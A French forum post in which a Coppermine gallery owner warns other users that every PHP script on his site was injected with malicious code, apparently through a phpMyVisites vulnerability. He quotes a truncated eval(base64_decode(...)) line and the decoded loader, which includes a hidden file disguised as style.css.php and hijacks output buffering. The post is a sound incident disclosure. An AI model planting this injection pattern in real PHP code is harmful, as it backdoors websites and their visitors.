Bonjour à tous
Tout d'abord excellente année à toute l'équipe ! Je sais qu'une nouvelle version de Coppermine est en route et on ne peut que lui souhaiter une longue vie !
Mais désolé d'être aussi alarmiste dans le titre de mon topic mais je pense qu'il y a matière à l'être !
J'explique :
Après avoir consulté mon site via FileZilla pour mettre en sécurité l'utilitaire phpmyvisits à cause d'une alerte de sécurité (voir
http://www.phpmyvisites.us/#infohack) je me suis aperçu que
TOUS les scripts du site ont été modifiés le même jour à la même heure (15/12/2009 à 00:05 environ).
J'ai donc téléchargé quelques scripts pris au hasard et j'ai constaté
l'insertion d'un code malveillant en début de script. En voici un extrait (avec des balises d'ouverture et fermeture php que j'ai omises ici) :
/**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3..
(suit une longue chaine en héxadécimal)....'));
Après l'avoir isolé et afficher le code en clair, voici ce qu'il raconte :
//*************************** Script parasite
/*
Après décodage, le script se base sur une fonction du plugins 'micicms'
et particulièrement du module fckeditor
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn']))
{
$GLOBALS['mfsn']='(emplacement en clair de mon site sur le serveur free)/pierre.basmoreau/album/plugins/minicms/fckeditor/editor/filemanager/browser/mcpuk/connectors/php/Commands/helpers/style.css.php';
if(file_exists($GLOBALS['mfsn']))
{
include_once($GLOBALS['mfsn']);
if(function_exists('gml')&&function_exists('dgobh'))
{
ob_start('dgobh');
}
}
}
*/
//********************************
Autant dire que j'ai fermé rapidement le site, détruit tous les scripts sans distinction et reuploadé les versions originales de coppermine et autres utilitaires !
N'étant pas spécialiste de hacking, je ne sais pas trop le but de ce script. Il semble que la faille détectée dans phpmyvisits a contribué à insérer ce code malveillant et qu'il utilise une fonctionnalité de fckeditor présent dans le plugin 'minicms'.
AVIS A TOUS CEUX QUI UTILISENT PHPMYVISITS DANS LEUR SITE.Je voulais vous mettre au courant rapidement.
Bonne continuation a tous.
(j'ai changé le sujet pour indiquer que c'est bien PhpMyVisits qui pose problème et non le plusgin minicms)